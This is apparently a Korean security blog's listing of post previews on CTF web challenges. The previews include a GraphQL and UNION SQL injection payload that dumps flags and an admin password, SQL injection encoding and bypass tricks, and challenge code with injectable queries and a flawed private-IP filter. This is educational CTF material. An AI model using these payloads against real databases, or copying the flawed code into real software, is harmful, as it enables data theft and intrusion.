i love cat
as3617
url parser confusing
보호되어 있는 글입니다.
Weird Javascript
주말에 ctf를 하는데 문제를 풀면서 굉장히 이상한 걸 발견했다. /* cakectf my-nyamber */ async function queryNekoByName(neko_name, callback) { let filter = /(\'|\\|\s)/g; let result = []; if (typeof neko_name === 'string') { /* Process single query */ if (filter.exec(neko_name) === null) { try { let row = await querySqlStatement( `SELECT * FROM neko WHERE name='${neko_name}'` ); if (row) result.push(row); } catch { } } } ..
DarkCON CTF web Writeup - DarkCON Challs
1. graphql injection 2. union sql injection get admin password { allUsers{ username password } } login - admin:is_this_visible_to_you? { Challs{ id title description category author points flag{ chall_flag } } } Get Flag using sql injection { hint(chall_id:"-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512),2,3/**/from/**/flags#"){ chall_id } }
SQL Injection 정리
주석 #, --, /**/ Express string select 0x6162; -> ab select 0b110000101100010; -> ab select char(0x61, 0x62); -> ab select concat(char(0x61), char(0x62)); -> ab select mid(@@version,12,1); -> n /* Using Gadget... */ select 'adm' 'in'; -> admin select 'ad''min'; -> ad'min select unhex(unhex(3631363236333634)); -> abcd Useful Functions 1. string substring(), substr(), mid() # select mid('abcde', 2, ..
TokyoWesterns CTF 2020 Web Writeup
urlcheck1 - 98 points app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z') def valid_ip(ip): matches = app.re_ip.match(ip) if matches == None: return False ip = list(map(int, matches.groups())) if any(i > 255 for i in ip) == True: return False # Stay out of my private! if ip[0] in [0, 10, 127] \ or (ip[0] == 172 and (ip[1] > 15 or ip[1] < 32)) \ or (ip[0] == 169 and ip[1] == 254) \ or (ip[0]..
PHP object injection
보호되어 있는 글입니다.
Python Pickle Deserialization Vulnerability (Python pickle 취약점)
보호되어 있는 글입니다.